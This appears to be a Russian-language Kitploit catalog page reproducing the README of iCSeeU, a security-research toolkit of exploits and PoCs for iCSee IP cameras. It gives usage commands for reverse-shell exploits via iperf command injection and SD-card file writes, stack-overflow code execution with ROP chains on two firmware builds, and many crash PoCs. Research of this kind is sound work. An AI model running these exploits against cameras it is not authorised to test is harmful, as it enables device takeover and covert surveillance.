Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
iCSeeU — Это набор инструментов/PoC/эксплойтов для камер, использующих приложение iCSee. И да — он может запускать игры NES! | Kitploit
Инструменты/GitHubGitHub/lr-m/icseeu
Безопасность встроенных системБезопасность IoTЭксплуатацияОбратная инженерияОтладчикиФаззингCTFАппаратная БезопасностьСтатьи и ИсследованияОбучение и ОбразованиеАнализ ПрошивокЭксплуатация Бинарных Файлов
141 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHublr-m/icseeu

iCSeeU

Это набор инструментов/PoC/эксплойтов для камер, использующих приложение iCSee. И да — он может запускать игры NES!

Репозиторий

Это набор инструментов/PoC/эксплойтов, которые можно использовать для видеозвонков камер iCSee через локальную сеть (а возможно, и для камер без видеозвонков). Это можно легко использовать для прошивки альтернативных прошивок в качестве замены метода обновления через SD-карту.

Примечание: Любой эксплойт повреждения памяти будет работать только в том случае, если версия прошивки вашей камеры — V5.00.R02.000949U5.10000.141324.0000010 или V5.00.R02.000807E5.10000.346724.0000010 — эти эксплойты полагаются на фиксированные смещения, которые меняются при каждой сборке прошивки.

Блоги

[0] Разведка, разбор и извлечение прошивки

[1] Изучение языка камер

[2] Поиск бесполезных целочисленных переполнений + несколько полезных ошибок

[3] Смерть от переполнения стека + забавы с канарейками

[4] Эксплуатация всего и вся

[5] Другая камера, то же приложение

[6] Подтверждение + полный эксплойт повреждения памяти на второй камере

[7] Эмуляция игр NES на камере

Зависимости

  • pycryptodome : Для шифрования входа RSA
  • pwntools : Для шелл-кода
  • pyftpdlib : Для FTP-сервера
  • pynput : Для ввода с клавиатуры NES

Функциональность

get_system_info

Использует метод get_system_info для получения информации о камере через порт 34567.

root@kitploit:~
python3 icseeu.py get_system_info
root@kitploit:~
{
  "Name": "SystemInfo",
  "Ret": 100,
  "SessionID": "0x0001869f",
  "SystemInfo": {
    "AlarmInChannel": 0,
    "AlarmOutChannel": 0,
    "AudioInChannel": 1,
    "BuildTime": "2024-06-27 10:33:41",
    "CombineSwitch": 0,
    "DeviceModel": "IPC_GK7201V300_G2-WR-V_S38",
    "DeviceRunTime": "0x000026c6",
    "DeviceType": 7,
    "DigChannel": 0,
    "EncryptVersion": "Unknown",
    "ExtraChannel": 0,
    "HardWare": "IPC_GK7201V300_G2-WR-V_S38",
    "HardWareVersion": "Unknown",
    "Pid": "A909409U5000000N",
    "SerialNo": "bf7816d59506ec06",
    "SoftWareVersion": "V5.00.R02.000949U5.10000.141324.0000010",
    "TalkInChannel": 1,
    "TalkOutChannel": 1,
    "UpdataTime": "",
    "UpdataType": "0x00000000",
    "VideoInChannel": 1,
    "VideoOutChannel": 1
  }
}

ftp_get_logs

Использует оставшуюся текстовую функциональность для извлечения журналов с устройства (журналы оказываются в FTPTestDir/Test).

root@kitploit:~
python3 icseeu.py ftp_get_logs

Эксплойты

gdb_revshell

Эксплуатирует уязвимость записи файлов на SD-карту и уязвимость выполнения бинарного файла iperf, что позволяет удаленно выполнить бинарный файл, находящийся на SD-карте, чтобы получить обратную оболочку и запустить отладчик GDB, который подключается к основному процессу App.

Терминал 1:

root@kitploit:~
nc -l 1234

Терминал 2:

root@kitploit:~
python3 icseeu.py gdb_revshell

Терминал 3:

root@kitploit:~
gdb-multiarch
gef-remote 192.168.188.2 8888

Примечание: Не останавливайте программу более чем на 30 секунд, иначе сторожевой таймер сработает, и процесс App перезапустится!

Примечание 2: Возможно, вам потребуется изменить жестко заданные IP-адреса в полезной нагрузке (GDB_Revshell/remote_mgmt.c) на IP-адрес вашей машины в локальной сети и пересобрать полезную нагрузку.

gdb_revshell_inject

Эксплуатирует уязвимость записи файлов на SD-карту и уязвимость внедрения команд iperf, что позволяет удаленно выполнить бинарный файл, находящийся на SD-карте, чтобы получить обратную оболочку и запустить отладчик GDB, который подключается к основному процессу App.

Это полезно для устройств, на которых уже присутствует бинарный файл iperf, что препятствует использованию другого метода.

Терминал 1:

root@kitploit:~
nc -l 1234

Терминал 2:

root@kitploit:~
python3 icseeu.py gdb_revshell_inject

Терминал 3:

root@kitploit:~
gdb-multiarch
gef-remote 192.168.188.2 8888

Примечание: Не останавливайте программу более чем на 30 секунд, иначе сторожевой таймер сработает, и процесс App перезапустится!

Примечание 2: Возможно, вам потребуется изменить жестко заданные IP-адреса в полезной нагрузке (GDB_Revshell/remote_mgmt.c) на IP-адрес вашей машины в локальной сети и пересобрать полезную нагрузку.

iperf_inject_exploit

Эксплуатирует внедрение команд iperf для установки обратной оболочки.

Терминал 1:

root@kitploit:~
nc -l 1234

Терминал 2:

root@kitploit:~
python3 icseeu.py iperf_inject_exploit

Примечание: Возможно, вам потребуется изменить жестко заданные IP-адреса в полезной нагрузке (Revshell_Inject/remote_mgmt.c) на IP-адрес вашей машины в локальной сети и пересобрать полезную нагрузку.

Эксплойт переполнения стека для GOKE GK7201

Это эксплойты для второго переполнения стека в обработчике сообщений типа 0x7d8. Это переполнение интересно тем, что позволяет обойти стековую канарейку и получить выполнение кода.

Вам потребуется собрать полезную нагрузку диспетчера, прежде чем они заработают (выполните make в каталоге PayloadDispatcher), и полезную нагрузку, которую вы хотите запустить на камере, выполнив make в соответствующих каталогах (например, ImageDisplay).

Примечания:

  • Версия прошивки камеры должна быть V5.00.R02.000949U5.10000.141324.0000010 (я не могу гарантировать, что она будет работать для других).

screenflash

Демонстрирует, что у нас есть выполнение кода, мигая экраном.

root@kitploit:~
python3 icseeu.py exploit_goke screenflash

rgb

Демонстрирует, что у нас есть контроль над экраном, мигая цветами RGB.

root@kitploit:~
python3 icseeu.py exploit_goke rgb

imagedisplay

Использует запись файла для загрузки сырого изображения RGB 5:6:5. Выполните ffmpeg -i image.jpg -vf scale=240:320 -c:v rawvideo -pix_fmt rgb565 -f rawvideo image.raw на изображении в каталоге, чтобы получить файл image.raw в каталоге ImageDisplay. Изображение будет отображено на экране.

root@kitploit:~
python3 icseeu.py exploit_goke imagedisplay

buttontest

Демонстрирует, что мы можем считывать состояние кнопок: мигает цветом, когда обнаруживается нажатие одной из кнопок.

root@kitploit:~
python3 icseeu.py exploit_goke buttontest

pong

Минимальная реализация игры Pong, которая демонстрирует, что у нас есть контроль над экраном и передними кнопками, а также демонстрирует немного более сложную полезную нагрузку.

root@kitploit:~
python3 icseeu.py exploit_goke pong

nes

Перенесенный эмулятор NES, который может запускать rom.nes, помещенный в каталог GOKE_Payloads/nes. Выполните make в GOKE_Payloads/nes/smolnes и GOKE_Payload/nes для генерации бинарных файлов.

root@kitploit:~
python3 icseeu.py exploit_goke nes

Эксплойт переполнения стека для XM530V200WX1

Это эксплойт для переполнения стека на другой камере без стековых канареек, но с NX. Я написал ROP-цепочку для поворота стека и выполнения большой ROP-цепочки. Эта ROP-цепочка отображает исполняемую память, загружает содержимое файла в память, создает поток, который выполняет его, затем восстанавливает состояние стека и продолжает выполнение.

Вам потребуется собрать полезную нагрузку, прежде чем они заработают. Выполните make в соответствующих каталогах (например, ImageDisplay).

Примечания:

  • Этот эксплойт довольно ненадежен, он работает примерно в 40-50% случаев (по неизвестным причинам он совершенно не любит создавать потоки).
  • Версия прошивки камеры должна быть V5.00.R02.000807E5.10000.346724.0000010 (я не могу гарантировать, что она будет работать для других).

screenflash

Демонстрирует, что у нас есть выполнение кода, мигая экраном.

root@kitploit:~
python3 icseeu.py exploit_xm530 screenflash

rgb

Демонстрирует, что у нас есть контроль над экраном, мигая цветами RGB.

root@kitploit:~
python3 icseeu.py exploit_xm530 rgb

imagedisplay

Использует запись файла для загрузки сырого изображения RGB 5:6:5. Выполните ffmpeg -i image.jpg -vf scale=240:320 -c:v rawvideo -pix_fmt rgb565be -f rawvideo image.raw на изображении в каталоге, чтобы получить файл image.raw в каталоге ImageDisplay. Изображение будет отображено на экране.

root@kitploit:~
python3 icseeu.py exploit_xm530 imagedisplay

PoC

Более подробная информация об этих доказательствах концепции (и их основных причинах) содержится в блогах в верхней части этого файла readme.

integer_underflow_http

Это PoC вызывает сбой из-за целочисленного переполнения вниз в HTTP-сервере.

root@kitploit:~
python3 icseeu.py integer_underflow_http

iperf_run

Это PoC выполнит файл, хранящийся на SD-карте по пути iperf/iperf (либо ash-скрипт, либо бинарный файл).

root@kitploit:~
python3 icseeu.py iperf_run

iperf_inject

Это PoC выполнит команду reboot через внедрение команд; файл iperf/iperf должен существовать на SD-карте, чтобы это сработало.

root@kitploit:~
python3 icseeu.py iperf_inject

assert_trigger_0x41a

Это PoC вызывает утверждение (assert) из-за большого выделения памяти в обработчике сообщений типа 0x41a (вызывая сбой).

root@kitploit:~
python3 icseeu.py assert_trigger_0x41a

integer_overflow_0x41a

Это PoC вызывает сбой из-за целочисленного переполнения, которое приводит к странному чтению за пределами буфера в обработчике сообщений 0x41a.

root@kitploit:~
python3 icseeu.py integer_overflow_0x41a

stack_overflow_0x43a

Это PoC вызывает сбой из-за переполнения стека в обработчике сообщений типа 0x43a.

root@kitploit:~
python3 icseeu.py stack_overflow_0x43a

stack_overflow_0x438_1

Это PoC вызывает сбой из-за первого переполнения стека в обработчике сообщений типа 0x438.

root@kitploit:~
python3 icseeu.py stack_overflow_0x438_1

stack_overflow_0x438_2

Это PoC вызывает сбой из-за второго переполнения стека в обработчике сообщений типа 0x438.

root@kitploit:~
python3 icseeu.py stack_overflow_0x438_2

stack_overflow_0xdac

Это PoC вызывает сбой из-за переполнения стека в обработчике сообщений типа 0xdac.

root@kitploit:~
python3 icseeu.py stack_overflow_0xdac

stack_overflow_0x5a4

Это PoC вызывает сбой из-за переполнения стека в обработчике сообщений типа 0x5a4.

root@kitploit:~
python3 icseeu.py stack_overflow_0x5a4

stack_overflow_0x414

Это PoC вызывает сбой из-за переполнения стека в обработчике сообщений типа 0x414.

root@kitploit:~
python3 icseeu.py stack_overflow_0x414

stack_overflow_0x410_1

Это PoC вызывает сбой из-за первого переполнения стека в обработчике сообщений типа 0x410.

root@kitploit:~
python3 icseeu.py stack_overflow_0x438_1

stack_overflow_0x410_2

Это PoC вызывает сбой из-за второго переполнения стека в обработчике сообщений типа 0x410.

root@kitploit:~
python3 icseeu.py stack_overflow_0x410_2

stack_overflow_0x5a8

Это PoC вызывает сбой из-за переполнения стека в обработчике сообщений типа 0x5a8.

root@kitploit:~
python3 icseeu.py stack_overflow_0x5a8

stack_overflow_0x41e

Это PoC вызывает сбой из-за переполнения стека в обработчике сообщений типа 0x41e.

root@kitploit:~
python3 icseeu.py stack_overflow_0x41e

stack_overflow_0x7d8_1

Это PoC вызывает сбой из-за первого переполнения стека в обработчике сообщений типа 0x7d8.

root@kitploit:~
python3 icseeu.py stack_overflow_0x7d8_1

stack_overflow_0x7d8_2

Это PoC вызывает сбой из-за второго переполнения стека в обработчике сообщений типа 0x7d8.

root@kitploit:~
python3 icseeu.py stack_overflow_0x7d8_2

stack_overflow_0x8a6

Это PoC вызывает сбой из-за переполнения стека в обработчике сообщений типа 0x8a6 (присутствует не во всех камерах).

root@kitploit:~
python3 icseeu.py stack_overflow_0x8a6
Скачать инструмент